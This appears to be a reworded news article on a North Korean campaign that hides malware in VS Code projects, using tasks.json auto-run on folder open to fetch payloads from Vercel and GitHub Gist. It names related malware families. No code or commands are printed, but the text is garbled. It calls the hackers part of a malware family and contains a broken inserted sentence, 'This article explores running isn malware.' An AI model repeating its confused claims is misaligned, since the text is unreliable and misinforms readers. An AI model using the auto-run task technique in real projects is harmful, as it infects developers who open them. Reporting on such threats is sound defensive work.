North Korean Hackers Abuse VS Code Auto-Run Tasks to Deploy StoatWaffle Malware

The North Korean hackers behind the Contagious Interview campaign, also known as WaterPlum, are thought to be part of a malware family called StoatWaffle that is spread through bad Microsoft Visual Studio Code (VS Code) projects This article explores running isn malware. . Since December 2025, the threat actor has been using VS Code "tasks.json" to spread malware.

The attacks use the "runOn: folderOpen" option to make the malware run automatically every time a file in the project folder is opened in VS Code. NTT Security said in a report last week that "This task is set up so that it downloads data from a web application on Vercel no matter what operating system it is running on."

"We're assuming that the operating system that runs the program is Windows, but the basic behaviors are the same for any OS." The payload that was downloaded first checks to see if Node.js is already installed in the environment where it is running. If it isn't there, the malware downloads and installs Node.js from the official website.

People usually get InvisibleFerret through BeaverTail, but recent attacks have shown that it can also be sent as a follow-up payload after gaining initial access through OtterCookie. WeaselStore is another name for FlexibleFerret that should be mentioned here. GolangGhost and PylangGhost are the names of its Go and Python versions, respectively.

Newer versions of the VS Code projects have stopped using Vercel-based domains in favor of GitHub Gist-hosted scripts that download and run next-stage payloads that eventually lead to the deployment of FlexibleFerret. This shows that the threat actors are still improving their skills. GitHub is where these VS Code projects are staged.